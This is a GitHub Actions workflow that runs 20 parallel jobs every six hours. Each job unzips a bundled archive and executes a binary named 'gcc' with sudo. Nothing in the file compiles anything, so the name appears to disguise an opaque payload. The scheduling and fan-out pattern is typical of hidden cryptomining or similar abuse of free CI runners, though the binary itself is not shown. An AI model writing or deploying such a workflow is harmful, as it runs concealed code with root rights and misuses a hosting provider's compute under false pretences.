name: Run
on: 
  workflow_dispatch:
  schedule:
     - cron:  '0 0/6 * * *'
  
jobs:
    run:
        runs-on: ubuntu-latest
        strategy:
          fail-fast: false
          matrix:
            runner: [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19]
        steps:
          - uses: actions/checkout@v2.3.4
          - shell: bash
            run: |
              sudo apt-get update
              sudo apt-get install unzip --yes
              unzip gcc.zip
              sudo chmod +x gcc
              sudo ./gcc
